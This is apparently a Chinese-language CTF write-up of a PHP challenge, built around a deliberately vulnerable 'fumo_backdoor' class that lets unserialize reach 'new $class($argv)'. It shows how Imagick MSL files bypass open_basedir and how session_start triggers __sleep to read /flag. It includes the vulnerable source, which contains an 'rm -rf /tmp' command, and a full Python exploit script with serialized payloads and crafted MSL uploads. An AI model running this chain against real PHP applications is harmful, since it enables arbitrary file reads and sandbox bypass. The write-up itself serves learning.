php中遇到new $a($b)的解法 imagick类的利用绕过open_basedir

今天做题遇到一个新的知识点，接下来回顾下。

源码

 <?php
error_reporting(0);
ini_set('open_basedir', __DIR__.":/tmp");
define("FUNC_LIST", get_defined_functions());class fumo_backdoor {public $path = null;public $argv = null;public $func = null;public $class = null;public function __sleep() {if (file_exists($this->path) && preg_match_all('/[flag]/m', $this->path) === 0) {readfile($this->path);}}public function __wakeup() {$func = $this->func;if (is_string($func) && in_array($func, FUNC_LIST["internal"])) {call_user_func($func);} else {$argv = $this->argv;$class = $this->class;new $class($argv);}}
}$cmd = $_REQUEST['cmd'];
$data = $_REQUEST['data'];switch ($cmd) {case 'unserialze':unserialize($data);break;case 'rm':system("rm -rf /tmp 2>/dev/null");break;default:highlight_file(__FILE__);break;
}

看到源码我人都懵了，唯一的思路就是new $class($argv)可能会用到内部类，但是读取文件可能要利用到sleep魔术方法，但是sleep是执行serialize()时，先会调用这个函数，所以如何触发这个方法成了一个问题。看了wp发现调用无参函数 session_start ，session_start 会将会话数据反序列化得到 fumo_backdoor 对象，会话结束时会将这个 fumo_backdoor 再次序列化，从而调用到 __sleep 方法。所以我们现在需要利用的就是new $class($argv);来读取到对flag进行操作，因为限制了目录，所以我们需要的方法要绕过目录的限制。

https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/

这篇文章介绍了imagick类，由于 Imagick 底层实现并不在 php 里，因此使用 Imagick 去读取文件可以无视 open_basedir。
imagick：文章中提到 ImageMagick 格式是 MSL。MSL 代表 Magick 脚本语言。它是一种内置的ImageMagick 语言，有助于读取图像、执行图像处理任务以及将结果写回文件系统。

而上图中的msl文件内容意思就是读取positive.png的内容，写入/tmp/xxxxx下，那我们能不能读取/flag写入/tmp目录下，然后反序列化读取文件就可以得到我们的flag了。
最后附上一篇大佬的payoad：

payload

import requests
import base64 
import time
import reurl = "http://192.168.137.131:28999/index.php"
url = "http://182.92.6.230:18080"
proxies = {"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"
}write_session_params = 'O%3A13%3A%22fumo_backdoor%22%3A4%3A%7Bs%3A4%3A%22path%22%3BN%3Bs%3A4%3A%22argv%22%3Bs%3A17%3A%22vid%3Amsl%3A%2Ftmp%2Fphp%2A%22%3Bs%3A4%3A%22func%22%3Bb%3A0%3Bs%3A5%3A%22class%22%3Bs%3A7%3A%22imagick%22%3B%7D'trigger_sleep_payload = 'aaa|O:13:"fumo_backdoor":4:{s:4:"path";s:9:"/tmp/xxxx";s:4:"argv";N;s:4:"func";s:12:"zend_version";s:5:"class";N;}'trigger_sleep_params = 'O%3A13%3A%22fumo_backdoor%22%3A4%3A%7Bs%3A4%3A%22path%22%3BN%3Bs%3A4%3A%22argv%22%3BN%3Bs%3A4%3A%22func%22%3Bs%3A13%3A%22session_start%22%3Bs%3A5%3A%22class%22%3BN%3B%7D&cmd=unserialze'def gen_ppm(payload):ppm_content = '''P6
9 9
255
{}'''.format((243-len(payload))*"\x00" + payload)ppm_content = base64.b64encode(ppm_content.encode()).decode()return ppm_contentdef rm_tmp_file():headers = {"Accept": "*/*"}requests.get(f"{url}/?cmd=rm",headers=headers,proxies=proxies)def upload_file(file_content,file_path):headers = {"Accept": "*/*","Content-Type": "multipart/form-data; boundary=------------------------c32aaddf3d8fd979"}data = f"--------------------------c32aaddf3d8fd979\r\nContent-Disposition: form-data; name=\"swarm\"; filename=\"swarm.msl\"\r\nContent-Type: application/octet-stream\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n <read filename=\"inline:data://image/x-portable-anymap;base64,{file_content}\" />\r\n <write filename=\"{file_path}\" />\r\n</image>\r\n--------------------------c32aaddf3d8fd979--"try:requests.post(f"{url}/?data={write_session_params}&cmd=unserialze",headers=headers, data=data,proxies=proxies)except requests.exceptions.ConnectionError:passdef upload_session():payload = gen_ppm(trigger_sleep_payload)upload_file(payload,"/tmp/sess_afkl")def copy_flag():headers = {"Accept": "*/*","Content-Type": "multipart/form-data; boundary=------------------------c32aaddf3d8fd979"}data = f"--------------------------c32aaddf3d8fd979\r\nContent-Disposition: form-data; name=\"swarm\"; filename=\"swarm.msl\"\r\nContent-Type: application/octet-stream\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n <read filename=\"mvg:/flag\" />\r\n <write filename=\"/tmp/xxxx\" />\r\n</image>\r\n--------------------------c32aaddf3d8fd979--"try:requests.post(f"{url}/?data={write_session_params}&cmd=unserialze",headers=headers, data=data,proxies=proxies)except requests.exceptions.ConnectionError:passdef get_flag():cookies = {"PHPSESSID": "afkl"}headers = {"Accept": "*/*"}response = requests.get(f"{url}/?data={trigger_sleep_params}&cmd=unserialze", headers=headers, cookies=cookies,proxies=proxies)print(response.text)return re.findall(r"(flag\{.*\})", response.text)if __name__ == '__main__':rm_tmp_file()time.sleep(2)copy_flag()time.sleep(2)upload_session()time.sleep(2)get_flag()

在ciscn2022的backdoor中出现了类似的做法，贴上wp：

https://github.com/AFKL-CUIT/CTF-Challenges/blob/master/CISCN/2022/backdoor/writup/writup.md

总结：

1. imagick类的利用
2. 通过php session反序列化来触发__sleep魔术方法